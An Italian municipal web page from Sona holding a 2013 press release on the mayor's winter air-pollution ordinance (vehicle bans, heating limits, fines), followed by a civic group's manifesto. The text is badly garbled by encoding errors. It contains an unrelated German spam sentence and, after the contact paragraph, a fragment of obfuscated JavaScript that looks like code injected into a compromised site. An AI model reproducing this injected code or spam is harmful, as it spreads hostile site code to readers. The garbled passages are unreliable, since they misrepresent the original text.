Sona, unai??i??ordinanza del Sindaco per contenere e prevenire lai??i??inquinamento atmosferico.

COMUNICATO STAMPAAi??Ai??
Sona,Ai?? 24 Ottobre 2013

Dallo scorso 7 Ottobre al prossimo 16 Maggio 2014 A? operativa lai??i??ordinanza del Sindaco per contenere e prevenire lai??i??inquinamento atmosferico nel Comune.

ai???Tutti dobbiamo dare il nostro contributo ai??i?? afferma il Sindaco di Sona, Gianluigi Mazzi ai??i?? per salvaguardare il bene piA? prezioso che abbiamo: il nostro ambiente. Non si tratta solo di limitare le emissioni del traffico veicolare , ma anche di porre in essere una serie di azioni che riducano lo scarico in atmosfera di inquinanti. Ad esempio, effettuare combustioni allai??i??aperto in ambito agricolo e di cantiere oppure riscaldare zone quali box, garage, depositi, al fine di non sprecare inutilmente energia e produrre inquinanti. Occorre anche ricordare che le direttive obbligano ad avere 19 gradi nelle abitazioni assimilate e 17 gradi per attivitAi?? industriali e artigianali. Si ricorda inoltre che nelle zone climatiche in fascia “E”, cui appartiene anche il Comune di Sona, l’accensione degli impianti termici A? stabilita per unAi??massimo di 14 ore giornaliereai???.

ai???Ma quello che impressiona di piA? ai??i?? continua Gianluigi Mazzi ai??i?? sono i consigli rivolti ai cittadini. Due per capire la portata del periodo che stiamo vivendo: evitare diAi?? trasportare i bambini ad unai??i??altezza di 30 – 50 cm dal suolo perchAi?? lAi?? si accumulano inquinanti (PM10) ed evitare che le fasce deboli (anziani, bambini) stiano allai??i??aria aperta nelle giornate di particolare inquinamento. Sono cose che fanno pensare a come ormai si sia su un punto di non ritornoai??? afferma.

Lai??i??ordinanza, reperibile nel sito del Comune di Sona, ormai si ripete di anno in anno e vede un complesso di direttive ad ampio raggio con un capitolo specifico per il traffico veicolare. In generale i veicoli a benzina Euro 0 e ad alimentazione Diesel, fino allai??i??Euro 2, non possono transitare nelle strade comunali a meno di non rientrare nelle eccezioni cui occorre prestare particolarmente attenzione.

Con lai??i??ordinanza si sono fissate anche le cosiddette ai???giornate provinciali dellai??i??ambienteai???: una A? prevista dal 6 dicembre al 6 gennaio 2014 e le altre per i giorni 16 Febbraio e 12/13 Aprile 2014.

Le sanzioni per il mancato rispetto delle direttive dellai??i??ordinanza sono molto pesanti: per lai??i??infrazione dei divieti legati al codice della strada si hanno ammende fino a 658 euro con la possibilitAi?? del ritiro della patente, mentre per le sanzioni non riconducibili allai??i??uso di veicoli occorre verificare caso per caso.

Geographie unterrichten literaturwissenschaftliche hausarbeit schreiben lernen die neue didaktik der geographie konkret eine empirische studien zum conceptual change in der geographie.

Il comando della Polizia Municipale e lai??i??Ufficio Ecologia del Comune sono a disposizione per ogni informazione in merito allai??i??ordinanza. );window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

Comments are closed.

Un nuovo futuro perSona

Ci accomuna un bisogno: quello di creare un nuovo modo di appartenere alla comunità.
Una strada concreta fatta di conoscenza, esperienza e analisi, elementi necessari allo sviluppo di nuove proposte solide e realizzabili.

Ci accomuna un forte senso di appartenenza a questa comunità che ci ha sempre visto coinvolti in prima persona in attività di interesse sociale e politico.
Attività che ci hanno preparato e motivato nel voler tradurre in realtà amministrativa un progetto libero dalle tattiche e dalle strategia di partito.

Ci accomuna l’esperienza e la competenza nei diversi settori stimolo per una nuova amministrazione basata su una programmazione attenta dei bisogni quotidiani ed essenziali dei cittadini; sull’ottimizzazione e la valorizzazione delle risorse e sull’identificazione di un programma di sviluppo del territorio.

Ci accomuna la voglia di fare, di provare a creare un futuro che è nostro e dei nostri figli, senza interessi, ma con lo spirito di servizio tipico del volontariato.

Ci muove la speranza di coinvolgere chi, come noi, ha voglia di rompere gli schemi della vecchia guardia politica e vuole rinnovare Sona e e sue frazioni per davvero.